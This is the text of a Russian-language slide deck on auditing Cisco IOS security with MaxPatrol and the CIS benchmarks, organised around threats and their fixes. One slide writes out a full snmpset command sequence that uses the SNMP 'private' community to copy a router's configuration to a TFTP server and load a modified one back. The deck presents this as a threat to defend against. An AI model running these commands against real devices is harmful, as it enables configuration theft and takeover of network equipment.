Upload
others
View
8
Download
0
Embed Size (px)
Citation preview
Сканирование Cisco IOS в MaxPatrol
Сафронов Илья
What’s the deal? ― Безопасность сетевых устройств (Cisco IOS) ― Стандарты безопасности ― Контроль за соответствием стандартам безопасности
PresenterPresentation NotesТут скажем что презентация о безопасной настройке IOS, соответствия стандартам безопасности и использования Maxpatrol.Презентация будет полезна для админов/безопасников сетей, которые могут прикупить себе МП для решения задач по приведению сети в безопасное состояниe
Cisco security hardening ― Комплексный подход к безопасности устройств Cisco.
• Management Plane (управляющий IOS’ом трафик (SSH, SNMP))
• Control Plane (трафик управления сетью (BGP, STP)) • Data Plane ( проходящие сквозь устройство данные)
Security benchmarking -CIS Рекомендации и стандарты по безопасности оборудования и ПО.
CIS – Cisco IOS
― Бенчмарк по безопасности для Cisco IOS
CIS – Cisco IOS Группы проверок:
― AAA ― SNMP ― Global services (CDP, DHCP, HTTP) ― Logging ― Neighbor authentication (EIGRP, OSPF, RIP)
Как проверить? ― Max Patrol
Чего бояться?
Проверка SNMP
Настройки на устройстве
Угроза – Snmpwalk enumeration
Угроза - Копирование файла конфигурации через SNMP
TFTP-сервер
snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address . snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config
snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1
///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройство snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address . snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 //Перезагрузка устройства для применения изменений
Решение?
Проверка finger
Настройки на устройстве
Угроза – login enumeration
Решение?
Проверка HTTP
Настройки на устройстве
Угроза – кража учетных данных
Решение ?
Проверка CDP
Настройки на устройстве
Угроза - Enumeration через CDP
Решение ?
Аутентификация OSPF
Настройки на устройстве
Угроза – «Отравление» таблиц маршрутизации
Решение?
Кастомный стандарт ― Не нравится / не подходит стандарт? ― Собери свой!
Заключение ― Защищайте свои сетевые устройства ― Следите за стандартами безопасности ― Регулярно проводите аудит сети
Конец рассказа Спасибо за внимание
Сафронов Илья
isafronov@ ptsecurity.ru
Slide Number 1Сканирование Cisco IOS в MaxPatrolWhat’s the deal?Cisco security hardeningSecurity benchmarkingCIS – Cisco IOSCIS – Cisco IOSКак проверить?Чего бояться?Проверка SNMPНастройки на устройствеУгроза – Snmpwalk enumeration�Угроза - Копирование файла конфигурации через SNMP�Решение?Проверка fingerНастройки на устройствеУгроза – login enumerationРешение?Проверка HTTPНастройки на устройствеУгроза – кража учетных данныхРешение ?Проверка CDPНастройки на устройствеУгроза - Enumeration через CDPРешение ?Аутентификация OSPFНастройки на устройствеУгроза – «Отравление» таблиц маршрутизацииРешение?Кастомный стандартЗаключениеSlide Number 33Slide Number 34